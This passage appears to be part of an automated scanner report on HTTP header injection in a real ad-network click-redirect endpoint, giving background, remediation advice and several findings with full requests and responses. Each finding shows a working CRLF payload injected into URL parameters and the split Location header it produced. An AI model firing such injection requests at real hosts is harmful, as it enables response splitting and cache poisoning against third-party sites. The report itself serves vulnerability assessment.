Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:17 GMT
Content-Length: 229
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150245525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:17 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">here</a>.</h2>
</body></html>

3. HTTP header injection
There are 144 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the ;ord request parameter is copied into the Location response header. The payload 8821f%0d%0a998b2e99413 was submitted in the ;ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=8821f%0d%0a998b2e99413 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:56 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=8821f
998b2e99413

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.2. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 10 is copied into the Location response header. The payload 81a35%0d%0a3ed9f4f3faf was submitted in the REST URL parameter 10. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/81a35%0d%0a3ed9f4f3faf/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:36 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/81a35
3ed9f4f3faf
/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.3. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 11 is copied into the Location response header. The payload df046%0d%0ab61ace5dcb9 was submitted in the REST URL parameter 11. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/df046%0d%0ab61ace5dcb9/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:39 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/df046
b61ace5dcb9
/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.4. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 12 is copied into the Location response header. The payload 38ffa%0d%0a47ffac444ce was submitted in the REST URL parameter 12. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/38ffa%0d%0a47ffac444ce/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:53 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/38ffa
47ffac444ce
/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.5. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 13 is copied into the Location response header. The payload 2a2b8%0d%0a0c1225ded6 was submitted in the REST URL parameter 13. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/2a2b8%0d%0a0c1225ded6/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:24 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/2a2b8
0c1225ded6
/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.6. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 14 is copied into the Location response header. The payload c89af%0d%0a0d3b2c9d2c9 was submitted in the REST URL parameter 14. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/c89af%0d%0a0d3b2c9d2c9/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=acnEV8r2PKMbuYn3Ydn4F5XpyFRGnTGDP2XlKn2vlsYZaThCaY83G72Ttfc5CJViEZdoE1yd1Usq1ZbkfXpBHsFbApGkQGaGqZahSVsP8xUffgA1ZcJVp3fGOk7aFW4651ixZdiVcxrSBw003nvjXVIEf2XPAXP6XZcC6N7lmJi0Qx9YJoVmjNuqvKua2TbsoQyZbupplRorx58Cv6udkK5BZdnvlBUg9PFVMsC02CkDuHC6wSkHoCoO85TeZaCJZcUVtkJJpJp5flYZcTO5urauvHDJ7Dp3003aZcFqpbqYhwrkd6ItSgJPR80QEwSu7vu1XhBZaT0PGw0w2CJeYDFtIg0c0oH5luK0yWQCcTF0DPbPtSTcIcMWRtVPxAZa2bGJDEEq7u9LJR1oPwDQM8yKZcPFQlNkLhGmfKura8wwWpoETrN9MojwpKjWrWTfKpVicdNDcLcyyhYcn785ynhy9ZalOT65XgXOJsFeJuuYBtATZaDxi8VYSOnUCo4f9q1aX40d5B2QUjZaMRvySYoWNvRbhT8IKlu04rk90BnxZc1IbderjTBELOqbYOocZaCRl6hZcFvan0TpSW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:38 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/c89af
0d3b2c9d2c9
/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.7. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 15 is copied into the Location response header. The payload 6ed4a%0d%0a7f5049d3d31 was submitted in the REST URL parameter 15. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/6ed4a%0d%0a7f5049d3d31/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:59 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/6ed4a
7f5049d3d31
/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.8. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 16 is copied into the Location response header. The payload db4cb%0d%0a91914b3fee4 was submitted in the REST URL parameter 16. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/db4cb%0d%0a91914b3fee4/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
